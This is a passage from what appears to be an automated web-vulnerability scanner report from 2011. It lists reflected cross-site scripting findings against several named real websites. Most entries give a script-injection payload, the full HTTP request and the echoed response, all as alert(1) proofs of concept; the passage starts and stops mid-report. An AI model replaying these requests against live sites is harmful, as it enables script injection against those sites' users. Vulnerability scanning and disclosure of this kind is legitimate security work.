This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetworkfebad"><script>alert(1)</script>82ddd457fa8/728x90/autnwsrlsttch/ss/a@Top1 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:12:02 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PjxIIO4016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 520 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0d45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:02 GMT;path=/
<!--- Start of 247B3/RadioShack/SELL_2011Q1/RTG/728_B3AdTag ---> <script LANGUAGE="JavaScript1.1" SRC="http://b3.mookie1.com/3/247B3/RadioShack/SELL_2011Q1/RTG/728/11864345014@x90?http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetworkfebad"><script>alert(1)</script>82ddd457fa8/728x90/autnwsrlsttch/ss/a/L7/1864345014/Top1/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_728.html/726348573830307044726341416f7670?"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acbe7"><script>alert(1)</script>31ceefc8c18 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90acbe7"><script>alert(1)</script>31ceefc8c18/autnwsrlsttch/ss/a@Top1 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:12:04 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PjxIKO10167S|O7016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 518 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:04 GMT;path=/
<!--- Start of 247B3/RadioShack/SELL_2011Q1/RTG/728_B3AdTag ---> <script LANGUAGE="JavaScript1.1" SRC="http://b3.mookie1.com/3/247B3/RadioShack/SELL_2011Q1/RTG/728/1877429826@x90?http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/728x90acbe7"><script>alert(1)</script>31ceefc8c18/autnwsrlsttch/ss/a/L7/877429826/Top1/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_728.html/726348573830307044726341416f7670?"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 915db"><script>alert(1)</script>9d0a28cc48b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch915db"><script>alert(1)</script>9d0a28cc48b/ss/a@Top1 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:12:07 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PjxINO2016Kj; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 520 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:07 GMT;path=/
<!--- Start of 247B3/RadioShack/SELL_2011Q1/RTG/728_B3AdTag ---> <script LANGUAGE="JavaScript1.1" SRC="http://b3.mookie1.com/3/247B3/RadioShack/SELL_2011Q1/RTG/728/11973812284@x90?http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch915db"><script>alert(1)</script>9d0a28cc48b/ss/a/L7/1973812284/Top1/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_728.html/726348573830307044726341416f7670?"> ...[SNIP]...
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8c41"><script>alert(1)</script>2ec6b63e70e was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ssd8c41"><script>alert(1)</script>2ec6b63e70e/a@Top1 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:12:09 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PjxIPO10167S|O4016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 520 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:09 GMT;path=/
<!--- Start of 247B3/RadioShack/SELL_2011Q1/RTG/728_B3AdTag ---> <script LANGUAGE="JavaScript1.1" SRC="http://b3.mookie1.com/3/247B3/RadioShack/SELL_2011Q1/RTG/728/11358408129@x90?http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ssd8c41"><script>alert(1)</script>2ec6b63e70e/a/L7/1358408129/Top1/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_728.html/726348573830307044726341416f7670?"> ...[SNIP]...
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c515b"><script>alert(1)</script>063cb3f5ca9 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1c515b"><script>alert(1)</script>063cb3f5ca9 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:12:11 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PjxIR; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 365 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:11 GMT;path=/
1.67. http://pcgro.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pcgro.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload beba3'%3balert(1)//a5854d94aff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as beba3';alert(1)//a5854d94aff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?beba3'%3balert(1)//a5854d94aff=1 HTTP/1.1 Host: pcgro.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 20:53:13 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Mon, 1 Jan 2001 00:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Pragma: no-cache X-Powered-By: PHP/5.2.17 Set-Cookie: 9e9d38e7ad620998fb8da7bce594c371=4b20ac2b0f499164fa2e1b141b01c72e; path=/ Set-Cookie: lang=deleted; expires=Sun, 31-Jan-2010 20:53:12 GMT; path=/ Set-Cookie: jfcookie=deleted; expires=Sun, 31-Jan-2010 20:53:12 GMT; path=/ Set-Cookie: jfcookie[lang]=en; expires=Tue, 01-Feb-2011 20:53:13 GMT; path=/ Last-Modified: Mon, 31 Jan 2011 20:53:14 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 79756
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <he ...[SNIP]... ge,.roknewspager-div a,#rokintroscroller,.feature-block .image-full']}); });window.addEvent('domready', function() { new GantryMoreArticles({'leadings': 1, 'moreText': 'Load More Articles', 'url': '/?beba3';alert(1)//a5854d94aff=1&tmpl=component&type=raw'}); }) window.addEvent('load', function() { new Fusion('ul.menutop', { pill: 0, effect: 'slide', opacity: 1, hideDelay: 500,
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8ecad'><script>alert(1)</script>cf169dd7d02 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /css/base.css8ecad'><script>alert(1)</script>cf169dd7d02 HTTP/1.1 Host: s.intensedebate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1; __utmc=239309019; __qca=P0-1269071080-1296494784940; __utmb=239309019.1.10.1296494785;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Date: Mon, 31 Jan 2011 20:41:46 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Server: nginx Vary: Accept-Encoding Connection: close Content-Length: 4793
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/css/base.css8ecad'><script>alert(1)</script>cf169dd7d02'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 86fcd'><script>alert(1)</script>3b532c73185 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /css/ie6.css86fcd'><script>alert(1)</script>3b532c73185 HTTP/1.1 Host: s.intensedebate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1; __utmc=239309019; __qca=P0-1269071080-1296494784940; __utmb=239309019.1.10.1296494785;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Date: Mon, 31 Jan 2011 20:41:45 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Server: nginx Vary: Accept-Encoding Connection: close Content-Length: 4792
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/css/ie6.css86fcd'><script>alert(1)</script>3b532c73185'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4cb57'><script>alert(1)</script>0de770915df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /css/sys.css4cb57'><script>alert(1)</script>0de770915df HTTP/1.1 Host: s.intensedebate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1; __utmc=239309019; __qca=P0-1269071080-1296494784940; __utmb=239309019.1.10.1296494785;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Date: Mon, 31 Jan 2011 20:41:41 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Server: nginx Vary: Accept-Encoding Connection: close Content-Length: 4793
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/css/sys.css4cb57'><script>alert(1)</script>0de770915df'> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 13f4b'><script>alert(1)</script>0aa548d0782 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images13f4b'><script>alert(1)</script>0aa548d0782/avatar-compact.png/ HTTP/1.1 Host: s.intensedebate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Date: Mon, 31 Jan 2011 17:33:32 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Server: nginx Vary: Accept-Encoding Connection: close Content-Length: 4812
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images13f4b'><script>alert(1)</script>0aa548d0782/avatar-compact.png/'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2dc7a'><script>alert(1)</script>2027a17b009 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images/avatar-compact.png2dc7a'><script>alert(1)</script>2027a17b009/ HTTP/1.1 Host: s.intensedebate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Date: Mon, 31 Jan 2011 17:33:33 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Server: nginx Vary: Accept-Encoding Connection: close Content-Length: 4811
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images/avatar-compact.png2dc7a'><script>alert(1)</script>2027a17b009/'> ...[SNIP]...
1.73. http://s.intensedebate.com/images/avatar-compact.png/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://s.intensedebate.com
Path:
/images/avatar-compact.png/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eef9c'><script>alert(1)</script>96c8bfb1934 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images/avatar-compact.png/?eef9c'><script>alert(1)</script>96c8bfb1934=1 HTTP/1.1 Host: s.intensedebate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Date: Mon, 31 Jan 2011 17:33:31 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Server: nginx Vary: Accept-Encoding Connection: close Content-Length: 4815
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images/avatar-compact.png/?eef9c'><script>alert(1)</script>96c8bfb1934=1'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 318e9'><script>alert(1)</script>74331322a03 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images/twitter-favicon.ico318e9'><script>alert(1)</script>74331322a03 HTTP/1.1 Host: s.intensedebate.com Proxy-Connection: keep-alive Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Date: Mon, 31 Jan 2011 20:48:24 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Server: nginx Vary: Accept-Encoding Content-Length: 4720
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images/twitter-favicon.ico318e9'><script>alert(1)</script>74331322a03'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eb51c'><script>alert(1)</script>74206c45e41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /js/idm-combined.jseb51c'><script>alert(1)</script>74206c45e41 HTTP/1.1 Host: s.intensedebate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1; __utmc=239309019; __qca=P0-1269071080-1296494784940; __utmb=239309019.1.10.1296494785;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Date: Mon, 31 Jan 2011 20:41:54 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Server: nginx Vary: Accept-Encoding Connection: close Content-Length: 4797
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/idm-combined.jseb51c'><script>alert(1)</script>74206c45e41'> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4a414<script>alert(1)</script>cf5cd8e3bbc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles4a414<script>alert(1)</script>cf5cd8e3bbc/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: shiflett.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a20e7<script>alert(1)</script>542bd57d083 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articlesa20e7<script>alert(1)</script>542bd57d083/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: shiflett.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 44b7b<script>alert(1)</script>9955f5d98cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
